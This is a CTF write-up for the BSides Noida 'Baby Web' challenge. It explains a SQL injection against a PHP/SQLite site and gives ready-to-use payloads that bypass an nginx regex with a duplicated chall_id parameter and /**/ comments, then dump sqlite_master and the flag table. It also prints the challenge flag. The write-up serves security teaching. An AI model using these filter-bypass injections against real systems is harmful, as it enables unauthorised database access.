Tags: web
Rating:
# Baby Web
#### Category : Web
#### Points : 420 (68 solves)
#### Author : Karma
## Problem
Just a place to see list of all challs from bsides noida CTF, maybe some flag too xD
Note : Bruteforce is not required.
[Link](http://ctf.babyweb.bsidesnoida.in/)
[Sauce](https://storage.googleapis.com/noida_ctf/Web/baby_web.zip)
## Solution
Downloading the source and hosting it in a docker locally, we see that this website takes a parameter `chall_id`
Looking at the `index.php` file, we see that the following sql query is being executed.
But if we try to put an alphabet in the parameter `chall_id`, we get an error.
Looking at `config/ctf.conf` in the source code, there is some regex that is used to prevent alphabets and white spaces.
To bypass this we can use two parameters so that first one is processed by nginx and second one bypasses it.
```html
GET /?chall_id=1&chall_id=a
```
And to bypass the white space restriction we can use comments.
So instead of `UNION SELECT`, we use `UNION/**/SELECT`
### Listing columns and tables
From opening `karma.db`(from source code) in sqlite browser, we see that it has 6 columns.
To list columns and tables, I used the following payload
```html
GET /?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,sql/**/FROM/**/sqlite_master
```
Using this payload we get a table named `flagsss` and column named `flag`
Now, we can use the following query to retrieve the flag.
```html
GET /?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,flag/**/FROM/**/flagsss
```
So the flag is `BSNoida{4_v3ry_w4rm_w31c0m3_2_bs1d35_n01d4}`